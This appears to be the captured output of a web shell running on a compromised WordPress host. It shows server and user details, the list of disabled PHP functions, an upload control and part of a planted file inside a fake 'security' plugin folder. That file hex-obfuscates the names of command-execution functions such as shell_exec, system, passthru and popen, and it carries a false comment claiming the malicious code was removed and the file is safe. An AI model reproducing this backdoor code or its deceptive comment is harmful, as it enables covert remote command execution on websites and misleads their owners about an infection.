HEX
Server: Apache
System: Linux c265a.dattaweb.com 4.18.0-553.97.1.el8_10.x86_64 #1 SMP Mon Jan 26 05:26:16 EST 2026 x86_64
User: c2650654 (20026)
PHP: 8.3.31
Disabled: system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
$ pwd: /home/c2650654/public_html/wp-content/plugins/security_1780777193/
Upload Files
File: /home/c2650654/public_html/wp-content/plugins/security_1780777193/custom_file_2_1780777194.php
<!--6S4MQRuo-->
6S4MQRuo<?php

$sync_manager7 = "p\x63l\x6Fse";
$sync_manager2 = "s\x68el\x6C_e\x78\x65\x63";
$sync_manager4 = "p\x61\x73s\x74\x68ru";
$api_gateway = "\x68e\x782b\x69n";
$sync_manager5 = "\x70op\x65n";
$sync_manager1 = "\x73\x79\x73tem";
$sync_manager3 = "\x65\x78ec";
$sync_manager6 = "stre\x61m_ge\x74_c\x6F\x6Ete\x6E\x74s";

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
@ Telegram